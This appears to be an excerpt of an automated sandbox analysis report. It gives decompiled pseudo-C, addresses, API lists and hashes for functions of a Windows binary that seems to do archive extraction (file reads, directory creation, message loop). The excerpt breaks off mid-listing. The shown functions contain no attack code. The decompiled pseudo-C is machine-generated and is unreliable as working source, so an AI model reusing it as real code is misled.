Opcode Fuzzy Hash: a0c28653848cc748aed6cfd033e371f98b9c1ce84e506aa3f37025ad23994853
Instruction Fuzzy Hash: E931F6715443446FE7309F20CD05BEB7BE4AB89318F100A2EF9D4662C1DBBA95888B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408A1C, Relevance: 6.1, APIs: 4, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408A1C(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t16;
				signed int _t17;
				long _t18;
				long _t27;
				void* _t30;

				_push(__ecx);
				_t30 = __ecx;
				_t27 = 0x4e20;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					if(_a8 > 0x4e20) {
						_a8 = 0x4e20;
					}
					 *(_t30 + 4) = GetStdHandle(0xfffffff6);
				}
				_t16 = ReadFile( *(_t30 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t16 != 0) {
					_t17 = _v8;
				} else {
					_t18 = E004089D6(_t30);
					if(_t18 == 0 || _a8 <= _t27) {
						if( *((intOrPtr*)(_t30 + 0xc)) != 1) {
							L11:
							if( *((intOrPtr*)(_t30 + 0xc)) != 0) {
								L14:
								_t17 = _t18 | 0xffffffff;
							} else {
								_t27 = 0x8000;
								if(_a8 <= 0x8000) {
									goto L14;
								} else {
									_t18 = GetLastError();
									if(_t18 == 0x21) {
										goto L7;
									} else {
										goto L14;
									}
								}
							}
						} else {
							_t18 = GetLastError();
							if(_t18 != 0x6d) {
								goto L11;
							} else {
								_t17 = 0;
							}
						}
					} else {
						L7:
						_t17 = E00408A1C(_t30, _a4, _t27);
					}
				}
				return _t17;
			}

0x00408a1f
0x00408a22
0x00408a29
0x00408a2e
0x00408a33
0x00408a35
0x00408a35
0x00408a40
0x00408a40
0x00408a52
0x00408a5a
0x00408aac
0x00408a5c
0x00408a5e
0x00408a65
0x00408a83
0x00408a90
0x00408a94
0x00408aa7
0x00408aa7
0x00408a96
0x00408a96
0x00408a9e
0x00000000
0x00408aa0
0x00408aa0
0x00408aa5
0x00000000
0x00000000
0x00000000
0x00000000
0x00408aa5
0x00408a9e
0x00408a85
0x00408a85
0x00408a8a
0x00000000
0x00408a8c
0x00408a8c
0x00408a8c
0x00408a8a
0x00408a6c
0x00408a6c
0x00408a72
0x00408a72
0x00408a65
0x00408ab3

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00408A3A
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00408A52
GetLastError.KERNEL32 ref: 00408A85
GetLastError.KERNEL32 ref: 00408AA0

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: b1bcf76779d1b7b5a2fb466a99f6a279a4ee6be457a0f1d96828b9bd31ee0188
Instruction ID: 35a90d60d0ad42fece529dd0a508fec2fb468c3dbb6e253368c91f3bb2a0828d
Opcode Fuzzy Hash: b1bcf76779d1b7b5a2fb466a99f6a279a4ee6be457a0f1d96828b9bd31ee0188
Instruction Fuzzy Hash: 8C115B31700604AFCF219B518A4096B77A9AB85374B10C53FE9A6A5AC0CF3D8D41CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD98, Relevance: 6.0, APIs: 4, Instructions: 29
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CD98() {
				struct tagMSG _v32;
				int _t6;
				long _t12;

				_t6 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t6 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					TranslateMessage( &_v32);
					_t12 = DispatchMessageW( &_v32); // executed
					return _t12;
				}
				return _t6;
			}

0x0040cda9
0x0040cdb1
0x0040cdba
0x0040cdc4
0x0040cdce
0x00000000
0x0040cdce
0x0040cdd6

APIs

PeekMessageW.USER32 ref: 0040CDA9
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CDBA
TranslateMessage.USER32(?), ref: 0040CDC4
DispatchMessageW.USER32 ref: 0040CDCE

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 8a22085fbe2cd0a06cd9db876dbc05d7e5695be33deb221e6ce0b723ed5dd291
Instruction ID: b3d4988087634ce7b0e2ec2490dfe3f0129f3e4222e53ef98935b5f129d96439
Opcode Fuzzy Hash: 8a22085fbe2cd0a06cd9db876dbc05d7e5695be33deb221e6ce0b723ed5dd291
Instruction Fuzzy Hash: E6E0ED72D0112AA7CB20ABF19C4CCDB7F6CEE062547404421BD15E3015E638D116C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00402C37, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402C37(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				signed int _t68;
				signed int _t74;
				intOrPtr _t83;
				intOrPtr _t95;
				signed int _t116;
				void* _t139;
				void* _t147;

				_t134 = __edx;
				E00419DD4(E004290B4, _t147);
				E0041A3E0(0xe700);
				_t141 = __ecx;
				if( *((char*)(__ecx + 0xa244)) == 0) {
					__eflags =  *((char*)(__ecx + 0x7b22)) - 5;
					if( *((char*)(__ecx + 0x7b22)) > 5) {
						L24:
						_t142 = _t141 + 0x1e;
						__eflags = _t141 + 0x1e;
						E004012DD(0x1c, _t142);
						L25:
						_t68 = 0;
						L26:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return _t68;
					}
					asm("sbb eax, eax");
					__eflags = ( *(__ecx + 0x7b21) & 0x000000ff) - ( ~( *((intOrPtr*)(__ecx + 0xa230)) - 3) & 0x0000001d);
					if(( *(__ecx + 0x7b21) & 0x000000ff) > ( ~( *((intOrPtr*)(__ecx + 0xa230)) - 3) & 0x0000001d)) {
						goto L24;
					}
					_t74 =  *(__ecx + 0x8b50) |  *(__ecx + 0x8b54);
					__eflags = _t74;
					if(_t74 != 0) {
						L7:
						_t139 = _t141 + 0x1c30;
						E0040B419(_t139);
						_push(_t139);
						E004171B2(_t147 - 0xe70c, _t134, _t139, __eflags); // executed
						_t105 = 0;
						 *(_t147 - 4) = 0;
						E00412222(_t147 - 0xe70c,  *((intOrPtr*)(_t141 + 0x8bec)), 0); // executed
						__eflags =  *(_t147 + 0xc);
						if( *(_t147 + 0xc) != 0) {
							L14:
							__eflags =  *((char*)(_t141 + 0x8b93));
							if( *((char*)(_t141 + 0x8b93)) == 0) {
								L17:
								_t105 = _t141 + 0x8b68;
								E004095F2(_t141 + 0x4b98,  *((intOrPtr*)(_t141 + 0x8b68)), 1);
								 *((intOrPtr*)(_t141 + 0x1c54)) =  *((intOrPtr*)(_t141 + 0x8b54));
								 *((intOrPtr*)(_t141 + 0x1c50)) =  *((intOrPtr*)(_t141 + 0x8b50));
								 *((char*)(_t141 + 0x1c58)) = 0;
								E0040B524(_t139, _t141,  *(_t147 + 0xc));
								 *((char*)(_t141 + 0x348f)) =  *((intOrPtr*)(_t141 + 0x8b91));
								 *(_t139 + 0x3c) =  *(_t139 + 0x3c) & 0x00000000;
								 *((intOrPtr*)(_t139 + 0x38)) = _t141 + 0x7b08;
								__eflags =  *((char*)(_t141 + 0x7b22));
								_t83 =  *((intOrPtr*)(_t141 + 0x8b58));
								_t116 =  *(_t141 + 0x8b5c);
								 *((intOrPtr*)(_t147 - 0x9acc)) = _t83;
								 *(_t147 - 0x9ac8) = _t116;
								 *((char*)(_t147 - 0x9ab4)) = 0;
								if(__eflags != 0) {
									E0041861B(_t147 - 0xe70c,  *(_t141 + 0x7b21) & 0x000000ff, 0); // executed
								} else {
									_push(_t116);
									_push(_t83);
									_push(_t139);
									E00406FC2(_t134, __eflags);
								}
								asm("sbb ecx, ecx");
								__eflags = E00409856(_t105, _t141 + 0x4b98, _t134, __eflags, _t105,  ~( *(_t141 + 0x8bc2) & 0x000000ff) & _t141 + 0x00008bc3);
								if(__eflags != 0) {
									 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
									E00415133(_t105, _t147 - 0xe70c, _t139, __eflags); // executed
									L6:
									_t68 = 1;
									goto L26;
								} else {
									E004062C8(0x1d, _t141 + 0x1e, _t141 + 0x7b28);
									E00406222(0x432a6c, 3);
									_t124 =  *(_t147 + 8);
									__eflags =  *(_t147 + 8);
									if(__eflags != 0) {
										E00412595(_t124);
									}
									L12:
									 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
									E00415133(_t105, _t147 - 0xe70c, _t139, __eflags);
									goto L25;
								}
							}
							_t95 =  *((intOrPtr*)(_t141 + 0x5704));
							__eflags =  *((char*)(_t95 + 0x4120));
							if(__eflags == 0) {
								goto L12;
							}
							asm("sbb edx, edx");
							_t134 =  ~( *(_t141 + 0x8b98) & 0x000000ff) & _t141 + 0x00008b99;
							_t96 = _t95 + 0x4020;
							__eflags = _t95 + 0x4020;
							E0040B544(_t139, _t105,  *((intOrPtr*)(_t141 + 0x8b94)), _t96,  ~( *(_t141 + 0x8b98) & 0x000000ff) & _t141 + 0x00008b99, _t141 + 0x8ba9,  *((intOrPtr*)(_t141 + 0x8be4)), _t141 + 0x8bba, _t141 + 0x8bc3);
							goto L17;
						}
						__eflags =  *(_t141 + 0x8b5c);
						if(__eflags < 0) {
							L13:
							_t106 =  *(_t147 + 8);
							E00401C05( *(_t147 + 8),  *((intOrPtr*)(_t141 + 0x8b58)));
							E0040B58F(_t139,  *_t106,  *((intOrPtr*)(_t141 + 0x8b58)));
							_t105 = 0;
							__eflags = 0;
							goto L14;
						}
						if(__eflags > 0) {
							L11:
							_t145 = _t141 + 0x1e;
							__eflags = _t141 + 0x1e;
							E004012DD(0x1c, _t145);
							goto L12;
						}
						__eflags =  *((intOrPtr*)(_t141 + 0x8b58)) - 0x1000000;
						if( *((intOrPtr*)(_t141 + 0x8b58)) <= 0x1000000) {
							goto L13;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x8b91)) - _t74;
					if( *((intOrPtr*)(__ecx + 0x8b91)) != _t74) {
						goto L7;
					}
					goto L6;
				}
				E004012DD(0x1b, __ecx + 0x1e);
				E00406222(0x432a6c, 3);
				goto L25;
			}

0x00402c37
0x00402c3c
0x00402c46
0x00402c4d
0x00402c57
0x00402c75
0x00402c7c
0x00402eae
0x00402eae
0x00402eae
0x00402eb4
0x00402eb9
0x00402eb9
0x00402ebb
0x00402ec1
0x00402ec9
0x00402ec9
0x00402c94
0x00402c99
0x00402c9b
0x00000000
0x00000000
0x00402ca7
0x00402ca7
0x00402cad
0x00402cbe
0x00402cbe
0x00402cc6
0x00402ccb
0x00402cd2
0x00402cd7
0x00402ce6
0x00402ce9
0x00402cee
0x00402cf1
0x00402d49
0x00402d49
0x00402d50
0x00402da4
0x00402da6
0x00402db4
0x00402dc8
0x00402dd1
0x00402dd7
0x00402dde
0x00402de9
0x00402def
0x00402df9
0x00402dfc
0x00402e03
0x00402e09
0x00402e0f
0x00402e15
0x00402e1b
0x00402e22
0x00402e3e
0x00402e24
0x00402e24
0x00402e25
0x00402e26
0x00402e27
0x00402e27
0x00402e4c
0x00402e63
0x00402e65
0x00402e9a
0x00402ea4
0x00402cb7
0x00402cb7
0x00000000
0x00402e67
0x00402e74
0x00402e80
0x00402e85
0x00402e88
0x00402e8a
0x00402e90
0x00402e90
0x00402d14
0x00402d14
0x00402d1e
0x00000000
0x00402d1e
0x00402e65
0x00402d52
0x00402d58
0x00402d5f
0x00000000
0x00000000
0x00402d85
0x00402d8d
0x00402d90
0x00402d90
0x00402d9f
0x00000000
0x00402d9f
0x00402cf3
0x00402cf9
0x00402d28
0x00402d28
0x00402d33
0x00402d42
0x00402d47
0x00402d47
0x00000000
0x00402d47
0x00402cfb
0x00402d09
0x00402d09
0x00402d09
0x00402d0f
0x00000000
0x00402d0f
0x00402cfd
0x00402d07
0x00000000
0x00000000
0x00000000
0x00402d07
0x00402caf
0x00402cb5
0x00000000
0x00000000
0x00000000
0x00402cb5
0x00402c5f
0x00402c6b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00402C3C

Strings

l*C, xrefs: 00402C66
l*C, xrefs: 00402E7B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: l*C$l*C
API String ID: 3519838083-2252155657
Opcode ID: 607b53ecc739ca50c88aa9f53dea6a52c20d6c00cbe5b6393c6d5244f6aa71d6
Instruction ID: d12e93b20499d97f33fb91a1a0ff3de5b725f604ded9e747a15b0741e48ca205
Opcode Fuzzy Hash: 607b53ecc739ca50c88aa9f53dea6a52c20d6c00cbe5b6393c6d5244f6aa71d6
Instruction Fuzzy Hash: 346106B0504B54AADB25DB35C955BEBBBA1EF05304F00897FE1EB622C2CB7C2944CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401113, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401113(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				unsigned int _t15;
				intOrPtr _t16;
				unsigned int _t20;
				intOrPtr _t23;
				unsigned int _t26;
				void* _t31;
				intOrPtr _t32;
				intOrPtr* _t34;

				_t12 = _a4;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) + _t12;
				_t23 =  *((intOrPtr*)(__ecx + 4));
				if(_t23 >  *((intOrPtr*)(__ecx + 8))) {
					_t13 =  *((intOrPtr*)(__ecx + 0xc));
					_push(_t31);
					if(_t13 != 0 && _t23 > _t13) {
						E0040634C(_t23, 0x432a6c, L"Maximum allowed array size (%u) is exceeded", _t13);
						E004062F7(0x432a6c);
					}
					_t14 =  *(_t34 + 8);
					_t9 = _t14 + 0x20; // 0x20
					_t15 = ( *(_t34 + 8) >> 2) + _t9;
					_t26 =  *(_t34 + 4);
					_t20 = _t26;
					_t43 = _t26 - _t15;
					if(_t26 <= _t15) {
						_t20 = _t15;
					}
					_push(_t20);
					_push( *_t34); // executed
					_t16 = E00419E8C(_t20, _t31, _t34, _t43); // executed
					_t32 = _t16;
					if(_t32 == 0) {
						_t16 = E004062F7(0x432a6c);
					}
					 *_t34 = _t32;
					 *(_t34 + 8) = _t20;
					return _t16;
				}
				return _t12;
			}

0x00401113
0x00401118
0x0040111a
0x0040111d
0x00401123
0x00401125
0x0040112a
0x00401132
0x0040113f
0x00401149
0x00401149
0x0040114e
0x00401156
0x00401156
0x0040115a
0x0040115d
0x0040115f
0x00401161
0x00401163
0x00401163
0x00401165
0x00401166
0x00401168
0x0040116d
0x00401173
0x00401177
0x00401177
0x0040117c
0x00401180
0x00000000
0x00401183
0x00401185

APIs

_realloc.LIBCMT ref: 00401168

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 00401139
l*C, xrefs: 0040112B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$l*C
API String ID: 620378156-1053225679
Opcode ID: abaddb3e007541c65ef73c2b367ee33c953fdd342ff2fdff51bceb200f256e4d
Instruction ID: 71e2b7cbeaa3fea5ef7dcfb57b4c7af18b375da253fdef46e4634eac3ff8ea0f
Opcode Fuzzy Hash: abaddb3e007541c65ef73c2b367ee33c953fdd342ff2fdff51bceb200f256e4d
Instruction Fuzzy Hash: 11018F757003055FD728EA25D89192BB3D9EF88754310443FE99B97B91EA39AC40C758

Uniqueness

Uniqueness Score: -1.00%

Function 0040C05C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C05C(int _a4) {
				signed int _t3;
				signed int _t4;
				int _t12;
				WCHAR* _t22;

				_t3 =  *0x434a90; // 0x3
				_t4 = _t3 + 1;
				 *0x434a90 = _t4;
				if(_t4 >= 8) {
					_t4 = 0;
					 *0x434a90 = 0;
				}
				_t22 = (_t4 << 0xa) + 0x432a90;
				 *_t22 = 0;
				if(E0040B842(0x432a7c) != 0) {
					L4:
					LoadStringW( *0x432a64, _a4, _t22, 0x200);
				} else {
					_t12 = LoadStringW( *0x432a68, _a4, _t22, 0x200); // executed
					if(_t12 == 0) {
						goto L4;
					}
				}
				E0040BBC2(0x432a7c, _t22, _t22, 0x200, 0, 0);
				return _t22;
			}

0x0040c05c
0x0040c061
0x0040c062
0x0040c06a
0x0040c06c
0x0040c06e
0x0040c06e
0x0040c07e
0x0040c08a
0x0040c09f
0x0040c0b3
0x0040c0bf
0x0040c0a1
0x0040c0ad
0x0040c0b1
0x00000000
0x00000000
0x0040c0b1
0x0040c0ca
0x0040c0d5

APIs

LoadStringW.USER32(?,-00432A8C,00000200), ref: 0040C0AD
LoadStringW.USER32(?,-00432A8C,00000200), ref: 0040C0BF

Strings

|*C, xrefs: 0040C082

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID: |*C
API String ID: 2948472770-571773988
Opcode ID: 6fa7ccb98ff5188a77e6e33f1a4c62f8328073463720cf5ab7d51840d95109ac
Instruction ID: 6e44c2bb692c96c9009f8965d2171a5917a4b7a9c1b7b62ab287517ace12dc82
Opcode Fuzzy Hash: 6fa7ccb98ff5188a77e6e33f1a4c62f8328073463720cf5ab7d51840d95109ac
Instruction Fuzzy Hash: 7A018132610215ABDA30AFA9AD84F577AADEB8A390F00413BF505D2261D7749C11D76C

Uniqueness

Uniqueness Score: -1.00%

Function 004109C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004109C7(void* __ecx, void* __edx) {
				void* _t3;

				_t9 = __edx;
				_t6 = __ecx;
				if(( *0x44ea40 & 0x00000001) == 0) {
					 *0x44ea40 =  *0x44ea40 | 0x00000001;
					_t17 =  *0x44ea40;
					 *0x44ea3c = E0041C00B(__ecx, __edx,  *0x44ea40);
				}
				_t3 = E0041C00B(_t6, _t9, _t17) -  *0x44ea3c;
				if(_t3 > 0x32) {
					L004114F4(); // executed
					_t3 = E004114EE();
					if(_t3 != 0) {
						_t3 = E004062C3(0x432a6c, 0xff);
					}
				}
				if( *0x432a77 != 0) {
					_t3 = E004062C3(0x432a6c, 0xff);
				}
				return _t3;
			}

0x004109c7
0x004109c7
0x004109ce
0x004109d0
0x004109d0
0x004109dc
0x004109dc
0x004109e8
0x004109fb
0x004109fd
0x00410a02
0x00410a09
0x00410a0e
0x00410a0e
0x00410a09
0x00410a1a
0x00410a1f
0x00410a1f
0x00410a26

APIs

_clock.LIBCMT ref: 004109D7

Part of subcall function 0041C00B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,004109E8,00000000,?,0040B7AA), ref: 0041C017
Part of subcall function 0041C00B: __aulldiv.LIBCMT ref: 0041C048

_clock.LIBCMT ref: 004109E3

Strings

l*C, xrefs: 004109F6

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Time_clock$FileSystem__aulldiv
String ID: l*C
API String ID: 3318706034-1043478356
Opcode ID: ee30605c8327d801bb236818e3247b96e0d83f7e903467d11dd7452c95104c8c
Instruction ID: 15903d0690bca01acd3a5013ce5fd6303561c612635b91d94ca0049c38e5f0fb
Opcode Fuzzy Hash: ee30605c8327d801bb236818e3247b96e0d83f7e903467d11dd7452c95104c8c
Instruction Fuzzy Hash: 4DE0E53560021006D730BB67AD867EE2A947F9275CF0544BFE401A2AA3CBBC0DD6456E

Uniqueness

Uniqueness Score: -1.00%

Function 0040904A, Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040904A(WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				int _t8;
				long _t12;
				void* _t13;

				E0041A3E0(0x1000);
				_t20 = _a4;
				_t8 = CreateDirectoryW(_a4, 0); // executed
				if(_t8 != 0 || E00409026(_t20) == 0 && E0040A582(_t20,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					if(_a8 != 0) {
						E00408E0E(_t20, _a12);
					}
					return 0;
				} else {
					_t12 = GetLastError();
					if(_t12 == 2 || _t12 == 3) {
						_t13 = 2;
						return _t13;
					} else {
						return 1;
					}
				}
			}

0x00409052
0x0040905f
0x00409065
0x00409069
0x0040909e
0x004090a4
0x004090a4
0x00000000
0x004090ad
0x004090ad
0x004090b6
0x004090c4
0x00000000
0x004090bd
0x00000000
0x004090bf
0x004090b6

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0040918C,?,00000001,00000000,?,?,?,?,?,00406599,?), ref: 00409065
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0040918C,?,00000001,00000000,?,?), ref: 00409094
GetLastError.KERNEL32(?,?,?,?,0040918C,?,00000001,00000000,?,?,?,?,?,00406599,?,00000001), ref: 004090AD

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: c424c7f408a83f0d835b35eb2c786a4cbf0db2c5974ff72df9cc5932475279f1
Instruction ID: 462116338cff26f63f1b495af5d8f8a8e79a4e9f4a5b62d5d9953dca1abb5ef9
Opcode Fuzzy Hash: c424c7f408a83f0d835b35eb2c786a4cbf0db2c5974ff72df9cc5932475279f1
Instruction Fuzzy Hash: FE01D63221020566EB31A7658C05FFF379C9B46784F04087BF911F22C2DA7DDC428ABA

Uniqueness

Uniqueness Score: -1.00%

Function 004080F3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004080F3(void* __ecx, void* __edx, void* __eflags) {
				signed int _t52;
				intOrPtr _t55;
				void* _t60;
				void* _t68;
				signed int _t81;
				signed int _t84;
				void* _t86;
				void* _t91;
				void* _t108;
				void* _t110;

				_t91 = __edx;
				E00419DD4(E00429258, _t108);
				E0041A3E0(0x1150);
				_t68 = __ecx;
				 *((char*)(__ecx + 0x5bf8)) = 0;
				 *((short*)(__ecx + 0x186c)) =  *( *((intOrPtr*)(__ecx + 8)) + 0x72b2) & 0x0000ffff;
				E004065D5(_t108 - 0x115c);
				_t93 = __ecx + 0x3af4;
				 *((intOrPtr*)(_t108 - 0x10)) = __ecx + 0x3af4;
				L3:
				if(E0040532C( *((intOrPtr*)(_t68 + 8)), _t93, 0x800) != 0) {
					_push(0);
					_t52 = E00409429(_t91, _t93, _t108 - 0x115c);
					__eflags = _t52;
					if(_t52 != 0) {
						 *((intOrPtr*)(_t68 + 0x18a8)) =  *((intOrPtr*)(_t68 + 0x18a8)) +  *((intOrPtr*)(_t108 - 0x15c));
						asm("adc [eax+0x4], ecx");
					}
					goto L3;
				}
				E004108E4(_t50,  *((intOrPtr*)(_t68 + 8)) + 0x93e8);
				_t55 = E0040532C( *((intOrPtr*)(_t68 + 8)), _t93, 0x800);
				_t115 = _t55;
				if(_t55 == 0) {
					L12:
					if( *((intOrPtr*)(_t68 + 0x3ae4)) == 0) {
						_t55 =  *((intOrPtr*)(_t68 + 8));
						if( *((short*)(_t55 + 0x72b2)) != 0x49 &&  *0x432a6c != 0xb) {
							if( *((char*)(_t68 + 0x5bf8)) == 0) {
								E004012DD(0x43, _t93);
							}
							_t55 = E00406222(0x432a6c, 0xa);
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t55;
				} else {
					goto L5;
				}
				do {
					L5:
					E0040CD6F(_t108 - 0x114);
					while(1) {
						 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
						_t81 = 0x40;
						memcpy(_t108 - 0x114,  *((intOrPtr*)(_t68 + 8)) + 0x4020, _t81 << 2);
						asm("movsw"); // executed
						E00407F3E(_t68, _t91, _t115); // executed
						_t84 = 0x40;
						_t60 = memcpy( *((intOrPtr*)(_t68 + 8)) + 0x4020, _t108 - 0x114, _t84 << 2);
						_t110 = _t110 + 0x18;
						asm("movsw");
						_t86 = _t108 - 0x114;
						if(_t60 != 1) {
							goto L8;
						}
						_t16 = _t108 - 4;
						 *_t16 =  *(_t108 - 4) | 0xffffffff;
						__eflags =  *_t16;
						E0040CD93(_t86);
						E0040CD6F(_t108 - 0x114);
					}
					L8:
					 *(_t108 - 4) =  *(_t108 - 4) | 0xffffffff;
					E0040CD93(_t86);
					_push(0);
					if(E00409429(_t91,  *((intOrPtr*)(_t108 - 0x10)), _t108 - 0x115c) != 0) {
						 *((intOrPtr*)(_t68 + 0x18a0)) =  *((intOrPtr*)(_t68 + 0x18a0)) +  *((intOrPtr*)(_t108 - 0x15c));
						asm("adc [eax+0x4], ecx");
					}
					_t55 = E0040532C( *((intOrPtr*)(_t68 + 8)),  *((intOrPtr*)(_t108 - 0x10)), 0x800);
				} while (_t55 != 0);
				_t93 =  *((intOrPtr*)(_t108 - 0x10));
				goto L12;
			}

0x004080f3
0x004080f8
0x00408102
0x00408108
0x0040810d
0x00408123
0x0040812a
0x0040812f
0x00408135
0x00408169
0x00408175
0x0040813f
0x00408149
0x0040814e
0x00408150
0x0040815e
0x00408166
0x00408166
0x00000000
0x00408150
0x00408180
0x0040818a
0x0040818f
0x00408191
0x0040824a
0x00408251
0x00408253
0x0040825e
0x00408270
0x00408275
0x00408275
0x00408281
0x00408281
0x0040825e
0x0040828c
0x00408294
0x00000000
0x00000000
0x00000000
0x00408197
0x00408197
0x0040819d
0x004081b8
0x004081bb
0x004081c1
0x004081ce
0x004081d2
0x004081d4
0x004081e4
0x004081eb
0x004081eb
0x004081ed
0x004081ef
0x004081f8
0x00000000
0x00000000
0x004081a4
0x004081a4
0x004081a4
0x004081a8
0x004081b3
0x004081b3
0x004081fa
0x004081fa
0x004081fe
0x00408203
0x00408216
0x00408224
0x0040822c
0x0040822c
0x0040823a
0x0040823f
0x00408247
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004080F8

Strings

l*C, xrefs: 0040827C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
